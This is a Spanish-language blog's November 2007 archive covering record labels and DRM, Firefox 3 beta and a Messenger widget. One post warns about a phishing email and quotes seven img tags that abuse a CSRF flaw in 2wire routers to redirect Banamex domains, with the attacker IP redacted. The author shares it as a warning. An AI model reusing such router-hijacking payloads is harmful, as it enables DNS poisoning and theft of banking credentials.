Monthly Archives: November 2007

Un clavo mas al ataud: EMI recorta fondeo a RIAA e IFPI

Un clavo mas al ataud anti-pirateria. Una de las cuatro mayores discograficas del mundo, esta por recortar el fondeo al IFPI y a la RIAA.

Y no es de sorprenderse. Año con año las ventas de CDs en el mundo se estan reduciendo significativamente (incluyendo Mexico, por supuesto) haciendo mas apretados los presupuestos de las disqueras. Y el costo de mantener la lucha antipirateria es muy alto. El IFPI reoprta que recibe de las disqueras aproximadamente 132 millones de dolares al año.

Las tacticas de guerrilla que han empleado las disqueras no estan funcionando y estan provocando que los usuarios se sigan yendo a otras opciones menos tradicionales, como el traspaso (legal e ilegal) en redes P2P y la compra en tiendas de musica como iTunes. Al parecer EMI es una de las disqueras que empieza a entenderlo, con iniciativas como la venta de canciones sin DRM en iTunes o esta otra iniciativa para la venta de canciones sin DRM con incentivos para los compradores fieles.

La tendencia no parece que se vaya a revertir y es curioso como el mismo mercado empieza a corregir los errores que dieron las disqueras con la lucha contra los usuarios. Seguramente esta no sera la ultima noticia que escuchemos al respecto. Esperemos que pronto podamos dar la ultima y definitiva.

Nuevo tipo de phishing ataca a clientes de Prodigy Infinitum

El dia de ayer recibi un correo de phising con una tarjeta de gusanito.com. Esto no seria nada sorprendente si no fuera por el nuevo metodo que estas personas estan utilizando.

Al hacer clic en el link fraudulento, me llevaba a una pagina de lo que parecia ser una tarjeta de gusanito.com comun y corriente. Al revisar el codigo tenia unas lineas similares a estas (detalles peligrosos omitidos)

 

<img alt="" src="http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38& NEXTPAGE=J38_SET&NAME=banamex.com&ADDR=[IPDELSITIOFRAUDULENTO] ">
<img alt="" src="http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38& NEXTPAGE=J38_SET&NAME=www.banamex.com&ADDR=[IPDELSITIOFRAUDULENTO] ">
<img alt="" src="http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38& NEXTPAGE=J38_SET&NAME=banamex.com.mx&ADDR=[IPDELSITIOFRAUDULENTO] ">
<img alt="" src="http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38& NEXTPAGE=J38_SET&NAME=www.banamex.com.mx&ADDR=[IPDELSITIOFRAUDULENTO] ">
<img alt="" src="http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38& NEXTPAGE=J38_SET&NAME=www.bancanetempresarial.banamex.com.mx&ADDR=[IPDELSITIOFRAUDULENTO] ">
<img alt="" src="http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38& NEXTPAGE=J38_SET&NAME=bancanetempresarial.banamex.com.mx&ADDR=[IPDELSITIOFRAUDULENTO] ">
<img alt="" src="http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38& NEXTPAGE=J38_SET&NAME=boveda.banamex.com&ADDR=[IPDELSITIOFRAUDULENTO] ">

 

Entre otras lineas similares. Estas lineas hacen uso de una vulnerabilidad de tipo CSRF de los routers 2wire inalambricos que son los que telmex regala a sus suscriptores de infinitum.

Lo que esta vulnerabilidad provoca, es que hace un cambio a los dns del router (AFAIK, no tengo un modem 2wire para probar ahora mismo)  para que cada vez que alguien accese a la banca en linea de banamex, en realidad entres al sitio fraudulento. Basicamente usa la CSRF para realizar un DNS poisoning. Y ni tu navegador, ni tu antivirus, ni tu firewall se darian cuenta. Seria transparante para el usuario.

Esta vulnerabilidad es especialmente peligrosa porque no es necesario que el usuario ejecute ningun archivo, ni que baje nada. Simplemente entrando a la pagina o si su lector de correo muestra la imagen, el daño estaria hecho.

Como siempre, se recomienda que no abran correos que no estan esperando o de gente que no conozcan y usen un cliente de correo decente como thunderbird, que avisa cuando el texto del enlace no coincide con el enlace mismo. Ademas cambiene la contraseña a su router, revisen periodicamente su configuracion o de plano cambien de router. Con esta vulnerabilidad se puede cambiar toda la configuracion del router. Desde cambiar la contraseña de administrador, activar o desactivar el wireless, activar o desactivar el firewall, etc.

Mas informacion de la vulnerabilidad aqui: http://securityreason.com/securityalert/3026

Minipost: Firefox 3 Beta 1 Lanzado

20070520-firefox_logo Mozilla acaba de anunciar que esta disponible la beta 1 de firefox 3

Entre otras cosas, esta version contiene:

  • Mejoras en la seguridad: Integracion con antivirus en el administrador de descargas, chequeo de plugins inseguros, entre otros
  • Mejoras en la facilidad de uso: Mas facil manejo de passwords, instalacion de extensiones, zoom de pagina completo
  • Mejoras en la personalizacion: Bookmarking de un click, capacidad de registrar aplicaciones web como protocol handlers (Esta suena peligrosa, sobre todo con los problemas que han tenido ultimamente pronvininentes precisamente de los protocol handlers), entre otros
  • Mejoras en el desempeño: Mas de 300 memory leaks arreglados (al fin!) entre otras mejoras

Mas info aqui: http://blog.mozilla.com/blog/2007/11/20/firefox-3-beta-1-ready-for-testing/

El principio del fin del DRM?

Edgar Bronfman, un ejecutivo de Warner Music, acaba de aceptar que todo lo que han hecho para evitar la pirateria en la musica, ha sido un paso equivocado para las disqueras.

En el congreso GSMA Mobile Asia, el dijo:

“Soliamos engañarnos a nosotros mismos. Soliamos pensar que nuestros contenidos eran perfectos tal cual eran. Esperabamos que nuestro negocio permaneciera intacto aun cuando un mundo de interactividad, conexion constante y comparticion de archivos estaba explotando. Y por supuesto, estabamos equivocados. Como? Por quedarnos inmoviles o moviendonos demasiado lentamente. Sin querer fuimos a una guerra contra los consumidores negandoles lo que ellos querian y que podian encontrar en otros lugares y como resultado, por supuesto, los consumidores ganaron”

“La triste verdad es lo que se le esta ofreciendo a los consumidores en la plataforma movil, es aburrido, vanal y basico. La gente quiere una manera mas interesante de contenidos musicales. Quieren acceso facil para comprar con un solo clic – si, un solo clic, no doce – Y quieren acceso rapido y facil donde quieran que esten, 24/7”

Esto viene muy a cuento por todas las medidas que han querido tomar las disqueras para evitar la pirateria y llevandose a todos los usuarios entre las patas. Pareciera que las disqueras ya se dieron cuenta que el DRM no es la solucion. El tratar con la punta del pie a tus clientes, a quienes te dan de comer, no es la solucion.

Por eso da risa ver en Mexico a artistitas de 4a pidiendo que no pirateen la musica y hasta creando sus clubes de “guardianes de la musica” para concientizar a la gente de que no bajen musica de internet. Mientras tanto, las ventas de discos en mexico siguen y siguen cayendo, es una tendencia que no va a cambiar pronto.

Esta grafica muestra las ventas totales de discos en mexico. La tendencia es clara.

ventasenmexico

 

Aletargados en su modelo de negocio tradicional pretenden ir en contra de una realidad que no podran detener. Hoy el modelo de negocio de la musica ya cambio, puede ir con la corriente o contra la corriente. Ellos deciden.

 

La rueda ya esta girando y no se va a detener, les guste o no les guste.

Google NO escanea tus plugins de firefox

Hace poco vi un post de un “Blogger, Entrepreneur, Senior Consultant, IT Architect, IT Specialist, Father, Indo, Bright” en el que gritaba alarmado que google analizaba tu firefox y que sabia que plugins estan instalados y que habia que quemarlo con leña verde.

Esto es completamente falso. Lo que hace google es simplemente detectar si el plugin esta instalado. Google no puede analizar tu instalacion de firefox (a menos que tu se lo permitieras :)).

Para ejemplo basta un boton. El siguiente parrafo te dira si tienes o no instalado firebug y peor aun! te dira que version tienes (solo es visible en la pagina, no en el RSS, a menos que tu feed reader sea muy muy malo)

[inline]

[script type=’text/javascript’]

[/script]

[/inline]

Quieres saber como lo hice? Ve el codigo fuente de esta pagina :). Esto es posible porque firebug expone una propiedad publica accesible por todos. Google no esta haciendo nada extraño. No es posible con otras extensiones a menos que se vuelvan intencionalmente detectables, como firebug.

Quieres saber como es posible que esto sea posible en javascript , y que ademas, hace que javascript sea un lenguaje inherentemente inseguro para algunas cosas? Dejame un mensaje y escribire un articulo sobre eso 🙂

No suelo contestar estas cosas, pero al leerlo me senti como el siguiente comic de dilbert

dilbert2007101222227.gif

Click para agrandar

Y no pude evitar escribir este post.

P.D. Que complicado es insertar javascript en una entrada de wordpres… sigh…

Widget de Windows Live Messenger en tu blog

Hace tiempo meebo, un cliente de mensajeria instantanea en web, creo su propio widget, con el que podias permitir que mandaran mensajes a tu cuenta de MSN, google o yahoo a traves de tu blog.

Pues parece que la gente del Windows Live Messenger les gusto la idea y la implementaron ellos mismos. En el blog de Live Messenger estan las instrucciones para poner tu messnger en tu blog. Es en realidad muy sencillo.

  1. Entra  esta pagina: http://settings.messenger.live.com/applications/websettings.aspx
  2. En la seccion configurar, activa el estado de messenger
  3. En la seccion Crear HTML escoge como quieres que se vea en tu blog: El status o la ventana completa de messenger.
  4. Pega el codigo que te genero en tu blog (o myspace, hi5, o lo que quieras 🙂 )

Yo lo voy a poner un ratito como prueba. En teoria si quieres mandar un mensaje anonimo, tienes que llenar un captcha, para evitar el spam.
Si alguien quiere dejarme un mensaje, ya saben donde hacerlo ^^

UPDATE

Esta tan chafa, que lo tuve que quitar a la semana. Bu.